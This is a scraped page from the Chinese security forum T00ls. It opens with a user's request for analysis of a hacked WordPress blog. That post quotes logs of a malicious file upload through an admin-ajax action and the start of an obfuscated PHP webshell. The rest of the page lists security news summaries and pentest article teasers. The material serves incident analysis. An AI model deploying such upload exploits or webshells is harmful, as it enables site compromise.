博客被日,大佬们分析分析样本

178.32.47.218 - - "GET /?p=18 HTTP/1.1" 200 76900178.32.47.218 - - "POST /wp-admin/admin-ajax.php?action=wmuUploadFiles HTTP/1.1" 200 876178.32.47.218 - - "POST /wp-content/uploads/2020/08/cdqwpoijxzao_index.jpg-1596722271.0896.php HTTP/1.1" 200 167贴一下几个低等级的.17286573.ico<?php$_w41dc = basename/*p4*/(/*jwp*/trim/*80r9*/(/*tw8*/preg_replace/*uba3g*/(/*vq91*/rawurldecode/*jx17*/(/*t*/"%2F ...

黑客攻击多个Reddit子版块并发布特朗普助选信息

目前已知遭遇黑手的版块包括 r/space 和 r/food,其分别拥有 1700 万 和 1900 万订阅者。被篡改后的 subreddit 主页出现了特朗普助选横幅,以及各种疑似明褒实贬的宣传语句,让人难以辨别幕后攻击者的“敌友”身份。目前上不清楚黑客是通过何种手段实现的本次大规模协同攻击,不过 Reddit 发言人称,该公司已就此展开调查。 ...

2020-08-08 19:19:05 0 184

AdGuard 曝光 295 款劫持谷歌和必应搜索结果的 Chrome 恶意扩展程序

据悉,AdGuard 员工在研究一系列可从谷歌官方 Chrome 网上应用店中找到假冒广告拦截扩展的方法,同时也发现了一些冒充天气预报小部件或屏幕截图工具的恶意扩展。在 AdGuard 发现的恶意扩展中(245 / 295),大多数都是相当简单的实用工具。除了为 Chrome 的“新建标签页”应用自定义背景,并没有其它附加的用途。不过在向 Z ...

2020-08-08 08:23:30 1 174

NSA向雇员发出谨慎启用位置数据的安全风险提示

《华尔街日报》指出,NSA 希望雇员不要打开移动设备的定位服务,因其或被用于移动追踪和提供对敏感数据的访问。该机构甚至希望雇员关闭追踪已丢失设备的查找服务,同时必须禁用已安装应用的位置数据和广告权限,且不建议在网上浏览和分享位置信息。NSA 内部指南写道:使用移动设备 —— 甚至仅仅是打开设备的电源 —— 都有 ...

2020-08-07 17:56:29 0 156

Twitter涉嫌滥用数据被FTC调查:或面临2.5亿美元罚款

Twitter周一在一份监管文件中称,上周收到了来自联邦贸易委员会的投诉草案,指控该社交媒体公司违反了2011年达成的一份和解协议。根据该协议,Twitter同意采取措施,更好地保护用户的个人数据。  这家总部位于旧金山的公司在监管文件中说,这项调查可能给公司带来1.5~2.5亿美元的损失。  Twitter在文件中说:“这 ...

2020-08-06 19:33:25 1 186

Linux 基金会联合厂商成立开源安全基金会 OpenSSF

OpenSSF 的成员来自核心基础设施联盟(Core Infrastructure Initiative)、GitHub 开源安全联盟和和其他创始董事会成员,例如 GitHub、Google、IBM、摩根大通、微软、NCC 集团、OWASP 基金会 和 Red Hat。其他创始成员还包括 ElevenPaths, GitLab, HackerOne, Intel, Okta, Purdue, SAFECode, StackHawk, Trail of Bits, Uber ...

2020-08-05 18:26:27 1 158

黑客从欧洲加密交易平台窃取超过130万美元

这家加密公司的首席执行官Ramon Ferraz Estrada在一系列推特帖子中透露,此次黑客攻击影响了加密投资账户,并泄露了用户密码,但他指出,欧元账户和钱包“是安全的”。为了补偿被盗的资金,2gether向客户提供了其原生代币2GT,价格相当于每枚5美分。2gether团队还将尝试分配更多资金来弥补剩余的损失。关于安全漏洞的未知细 ...

2020-08-04 09:13:12 1 231

热门活动

T00ls专家

zcgonvh

荣誉会员

文章26篇,精华12篇

1

Twi1ight

荣誉会员

文章35篇,精华11篇

2

Bypass

荣誉会员

文章26篇,精华5篇

3

Rices

荣誉会员

文章152篇,精华5篇

4

lyxhh

版主

文章13篇,精华4篇

5

backlion

注册会员

文章29篇,精华3篇

6

lostwolf

荣誉会员

文章144篇,精华2篇

7

宝宝

注册会员

文章53篇,精华2篇

8

thesoul

荣誉会员

文章30篇,精华2篇

9

LandGrey

注册会员

文章25篇,精华2篇

10

最新精华

渗透测试Spring Boot 相关漏洞利用 Check List

> Spring Boot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全 ...

2020-06-06 16:16:41 53 2172

渗透测试Windows内网协议-Kerberos

## Kerberos协议### 简介Kerberos是一种由MIT(麻省理工大学)提 ...

2020-04-15 21:59:32 11 738

渗透测试这是一篇“不一样”的真实渗透测试案例分析文章

# 0x00 前言本文是由一次真实的授权渗透案例引申而出的技术分析 ...

2020-03-20 18:16:34 66 10655

渗透测试Windows认证原理解析基础入门学习

#### 0x01 前言简介本文借鉴安全界各位大佬所写的Windows认证入 ...

2020-03-17 13:07:21 16 536

渗透测试CVE-2020-0688的武器化与.net反序列化漏洞那些事

# CVE-2020-0688的武器化与.net反序列化漏洞那些事## 0x00 前言T ...

2020-03-01 21:07:59 47 8970

获取webshell到内网渗透一条龙

获取webshell到提权到内网渗透一条龙其实相比起我这个文章来说,我觉得题目更霸气。呵呵。闲话少说,咱们开始今天的文章[b]0x01、[/b]首先呢 我的目标站是一个小型的工作室公司。比较小。网站是asp cms的asp有一个比较二蛋的漏洞,上次文章写过了,就不再强调了。我们首先去注册一个用户然后我们利用谷歌cookie修改插件 我们把值修改为admin将ID的值修改为1.这样我们就可以来修改admin的 ...

清华大学(tsinghua.edu.cn)某分站存在SQL注入漏洞

根据《中华人民共和国网络安全法》,本站漏洞永不公开,若厂商想了解详情请咨询admin@t00ls.net!

Top ↑